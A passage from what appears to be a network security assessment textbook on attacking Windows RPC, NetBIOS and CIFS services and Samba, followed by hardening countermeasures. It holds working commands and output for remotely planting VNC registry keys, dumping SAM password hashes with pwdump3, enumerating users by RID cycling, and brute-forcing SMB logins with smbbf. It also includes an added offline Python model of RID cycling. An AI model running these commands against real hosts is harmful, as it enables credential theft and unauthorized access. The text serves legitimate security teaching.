    SocketConnect = REG_DWORD 0X00000001
    Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e
After listing the keys you wish to add to the registry, use the regini command to insert them:
C:\> regini -m \\192.168.189.1 winvnc.ini
Removing registry keys from the remote system is easily achieved using the reg command (found within Windows NT family systems) with the correct delete option. To remove the VNC keys just set, use the following command:
C:\> reg delete \\192.168.189.1\HKU\.DEFAULT\Software\ORL\WinVNC3
Through compromising the password of a user in the Administrators group, the SAM encrypted password hashes can be dumped directly from memory of the remote host, thus bypassing SYSKEY encryption protecting the hashes stored within the SAM database file. A Windows utility known as pwdump3 can achieve this by authenticating first with the ADMIN$ share and then extracting the encrypted user password hashes. pwdump3 is available from http://packetstormsecurity.org/crackers/nt/pwdump3.zip.
Example 10-19 shows pwdump3 dumping the encrypted user password hashes from the Windows 2000 host at 192.168.189.1 to hashes.txt using the Administrator account (although any user account in the Administrators group can be used).
D:\pwdump> pwdump3 192.168.189.1 hashes.txt Administrator
pwdump3 by Phil Staubs, e-business technology
Copyright 2001 e-business technology, Inc.
This program is free software based on pwpump2 by Tony Sabin under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see the COPYING file included with this program (also available at www.ebiz-tech.com/pwdump3) and the GNU GPL for further details.
Please enter the password >secret
Completed.
Two tools that can be used to crack Windows password hashes downloaded in this way are as follows:
Cain & Abel (http://www.oxid.it)
John the Ripper (http://www.openwall.com/john)
Cain & Abel is more advanced, supporting rainbow table cracking of NTLM hashes, whereas John the Ripper is used to perform basic (and quick) dictionary-based attacks. Rainbow cracking of stored authentication hashes involves a time-memory trade-off, where hashes are precomputed and stored in a rainbow table, which is then cross-referenced with the hashes to reveal the passwords.
Three toolkits used to generate rainbow tables that can be used from Cain & Abel to attack many types of encrypted password hash are as follows:
Winrtgen (http://www.oxid.it/downloads/winrtgen.zip)
Ophcrack (http://ophcrack.sourceforge.net)
RainbowCrack (http://www.antsight.com/zsl/rainbowcrack)
The CIFS service is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility.
Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).
In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job.
The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Windows executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.
The smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both NetBIOS session (TCP 139) and CIFS (TCP 445) services. A second useful feature is the way the utility can enumerate users through a direct dump that works with RestrictAnonymous=0, but also using the RID cycling technique that can evade RestrictAnonymous=1 settings by attempting to reverse each ID value to a username. Example 10-20 shows the usage and command-line options for smbdumpusers.
D:\smb-at> smbdumpusers
SMB - DumpUsers V1.0.4 by ([email protected])
-------------------------------------------------------------------
usage: smbdumpusers -i <ipaddress|ipfile> [options]
-i* IP or <filename> of server[s] to bruteforce
-m Specify which mode
1 Dumpusers (Works with restrictanonymous=0)
2 SidToUser (Works with restrictanonymous=0|1)
-f Filter output
0 Default (Filter Machine Accounts)
1 Show All
-e Amount of sids to enumerate
-E Amount of sid mismatches before aborting mode 2
-n Start at SID
-s Name of the server to bruteforce
-r Report to <ip>.txt
-t timeout for connect (default 300ms)
-v Be verbose
-P Protocol version
0 - Netbios Mode
1 - Windows 2000 Native Mode
Example 10-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 10-3) through CIFS.
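Both the GetAcct passage above and smbdumpusers mode 2 rely on the same SID arithmetic; the following added example (not code from either tool or from the original text) models it, including why a renamed Administrator still surfaces at RID 500, which bears on the account-renaming countermeasure later in this chapter. DOMAIN_SID, SAMPLE_ACCOUNTS and sample_lookup are constructed stand-ins for a host's LSA SID-to-name lookup; nothing here touches the network.

```python
"""RID cycling: the SID arithmetic that GetAcct and smbdumpusers -m 2 iterate over.

Added example, not from the original text or from either tool. The account
domain SID is fixed and only the last sub-authority (the RID) changes, so a
SID-to-name lookup finds the built-in Administrator at RID 500 whatever it is
called. DOMAIN_SID, SAMPLE_ACCOUNTS and sample_lookup are constructed stand-ins
for a host's LSA; no network access is involved.
"""
import struct

# Default names of the two RIDs Windows fixes regardless of later renaming.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest"}
FIRST_USER_RID = 1000          # accounts created by administrators start here


def sid_to_bytes(sid: str) -> bytes:
    """Serialize 'S-1-5-21-a-b-c-rid' into the binary layout LSA passes around:
    revision(1) sub-authority count(1) identifier authority(6, big-endian)
    then each sub-authority as a little-endian uint32."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("malformed SID: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    head = bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
    return head + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(raw: bytes) -> str:
    """Inverse of sid_to_bytes."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def split_rid(sid: str):
    """'S-1-5-21-a-b-c-1001' -> ('S-1-5-21-a-b-c', 1001)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def rid_cycle(domain_sid: str, lookup, start: int, count: int, max_misses: int = 50) -> dict:
    """Resolve domain_sid-RID for `count` RIDs from `start` through lookup(sid) -> name|None,
    giving up after `max_misses` consecutive unresolved RIDs (cf. smbdumpusers -n/-e/-E)."""
    found, misses = {}, 0
    for rid in range(start, start + count):
        name = lookup("%s-%d" % (domain_sid, rid))
        if name is None:
            misses += 1
            if misses >= max_misses:
                break
            continue
        misses = 0
        found[rid] = name
    return found


def renamed_builtins(found: dict) -> list:
    """Accounts whose RID is well known but whose name was changed: the rename
    hides nothing from a SID-to-name lookup, only from a name-based guess."""
    return [(rid, name, WELL_KNOWN_RIDS[rid]) for rid, name in sorted(found.items())
            if rid in WELL_KNOWN_RIDS and name.lower() != WELL_KNOWN_RIDS[rid].lower()]


# Constructed sample: a host whose Administrator account was renamed to "ops-root".
DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_ACCOUNTS = {500: "ops-root", 501: "Guest",
                   1000: "__vmware_user__", 1001: "Mickey", 1002: "VUSR_OSG-SERV"}


def sample_lookup(sid: str):
    """Stand-in for the LSA lookup an anonymous session can still perform
    under RestrictAnonymous=1."""
    domain, rid = split_rid(sid)
    return SAMPLE_ACCOUNTS.get(rid) if domain == DOMAIN_SID else None


if __name__ == "__main__":
    users = {**rid_cycle(DOMAIN_SID, sample_lookup, 500, 20),
             **rid_cycle(DOMAIN_SID, sample_lookup, FIRST_USER_RID, 200, max_misses=10)}
    for rid, name in sorted(users.items()):
        print("%s-%d  %s" % (DOMAIN_SID, rid, name))
    print("renamed built-ins:", renamed_builtins(users))
```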
The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 10-22 shows the smbbf usage.
D:\smb-at> smbbf
SMB - Bruteforcer V1.0.4 by ([email protected])
--------------------------------------------------------------
usage: smbbf -i [options]
-i* IP address of server to bruteforce
-p Path to file containing passwords
-u Path to file containing users
-s Server to bruteforce
-r Path to report file
-t timeout for connect (default 300ms)
-w Workgroup/Domain
-g Be nice, automatically detect account lockouts
-v Be verbose
-P Protocol version
0 - Netbios Mode
1 - Windows 2000 Native Mode
To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 10-23.
D:\smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1
INFO: Could not determine server name ...
-- Starting password analysis on 192.168.189.1 --
Logging in as Administrator with secret on WIDGETS
Access denied
Logging in as Administrator with qwerty on WIDGETS
Access denied
Logging in as Administrator with letmein on WIDGETS
Access denied
Logging in as Administrator with password on WIDGETS
Access denied
Logging in as Administrator with abc123 on WIDGETS
Access denied
The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second.
If smbbf is run with only an IP address specified, it does the following:
Retrieves a list of valid usernames through a null session
Attempts to log in to each account with a blank password
Attempts to log in to each account with the username as password
Attempts to log in to each account with the password of “password”
The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.
The Samba open source suite (http://www.samba.org) allows Linux and other Unix-like platforms to operate more easily within Windows NT domains and provides seamless file and print services to SMB and CIFS clients. A number of remote vulnerabilities have been found in Samba services, allowing attackers to execute arbitrary code and commands and bypass security restrictions.
At the time of this writing, the MITRE CVE list contains a number of serious remotely exploitable issues in Samba (not including DoS issues), as shown in Table 10-8.
| CVE name | Date | Notes |
| --- | --- | --- |
| CVE-2007-2446 and CVE-2007-2447 | 15/05/2007 | Multiple Samba 3.0.25rc3 MSRPC component vulnerabilities |
| CVE-2007-0453 | 05/02/2007 | nss_winbind.so.1 (as used by Samba 3.0.23d on Solaris) arbitrary code execution via DNS functions |
| CVE-2004-1154 | 16/12/2004 | Samba 3.0.9 MSRPC heap overflow |
| CVE-2004-0882 | 15/10/2004 | Samba 3.0.7 QFILEPATHINFO request handler overflow |
| CVE-2004-0815 | 30/09/2004 | Samba 3.0.2a malformed pathname security restriction bypass |
| CVE-2003-1332 | 27/07/2003 | Samba 2.2.7 reply_nttrans( ) overflow |
| CVE-2003-0201 | 07/04/2003 | Samba 2.2.7 call_trans2open( ) overflow |
| CVE-2003-0085 | 14/03/2003 | Samba 2.2.7 remote packet fragment overflow |
| CVE-2002-1318 | 20/11/2002 | Samba 2.2.6 password change request overflow |
| CVE-2002-2196 | 28/08/2002 | Samba 2.2.4 and prior enum_csc_policy( ) overflow |
| CVE-2001-1162 | 24/06/2001 | Samba 2.0.8 and prior remote file creation vulnerability |
MSF supports CVE-2003-0201 and CVE-2007-2446. Immunity CANVAS supports CVE-2003-0201 and CVE-2003-0085, and CORE IMPACT supports CVE-2003-0201, CVE-2003-0085, CVE-2007-2446, and CVE-2007-2447 at this time. Milw0rm (http://www.milw0rm.com) has a number of useful Samba exploits, including exploits for the Samba SWAT web server.
Depending on the open network ports of a given Unix-like host running Samba, you will be presented with a number of avenues to perform enumeration and brute-force password-grinding attacks. In particular, refer to the earlier examples of attacks launched against MSRPC, NetBIOS session, and CIFS services because the same tools will be equally effective against accessible Samba services running on ports 135, 139, and 445, respectively.
The following countermeasures should be considered when hardening Windows services:
Filter public or untrusted network access to high-risk services, especially the RPC endpoint mapper (TCP and UDP port 135), and the NetBIOS session and CIFS services (TCP ports 139 and 445), which can be attacked and used to compromise Windows environments. Do not forget to filter RPC service endpoints, accessible on TCP and UDP ports above 1025.
Ensure local administrator account passwords are set because these are often set to NULL on workstations when domain authentication is used. If possible, disable the local computer Administrator accounts across your network.
Enforce a decent user account lockout policy to minimize the impact of brute-force password-grinding attacks.
Microsoft RPC service-specific countermeasures:
If RPC services are accessible from the Internet, ensure that the latest Microsoft security patches relating to RPC components are always installed and maintained to a good degree.
Disable the Task Scheduler and Messenger services if they aren’t required. The Task Scheduler can be used by attackers to remotely execute commands, and both services have known memory management issues.
In high-security environments, you can consider disabling DCOM completely, although it will break a lot of functionality. Microsoft KB article 825750 discusses this; you can find it at http://support.microsoft.com/default.aspx?kbid=825750.
Be aware of threats presented by RPC over HTTP functionality within Microsoft IIS web services (when COM Internet Services is installed). Ensure that the RPC_CONNECT HTTP method isn't allowed (unless required) through any publicly accessible web services in your environment.
NetBIOS session and CIFS service-specific countermeasures:
Enforce RestrictAnonymous=2 under Windows 2000, XP, and 2003 hosts to prevent enumeration of system information through NetBIOS. The registry key can be found under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. Microsoft KB articles 246261 and 296405 discuss the setting in detail, available from http://support.microsoft.com.
Enforce NTLMv2 if possible. Fast, multithreaded brute-force tools, such as SMBCrack, take advantage of weaknesses within standard NTLM, and therefore don’t work against the cryptographically stronger NTLMv2.
Rename the Administrator account to a nonobvious name (e.g., not admin or root), and set up a decoy Administrator account with no privileges.
The Microsoft Windows 2000 Resource Kit contains a tool called passprop.exe that can lock the administrator account and prevent it from being used across the network (thus negating brute-force and other attacks), but still allows administrator logons locally at the system console. To lock the Administrator account in this way, issue a passprop /adminlockout command.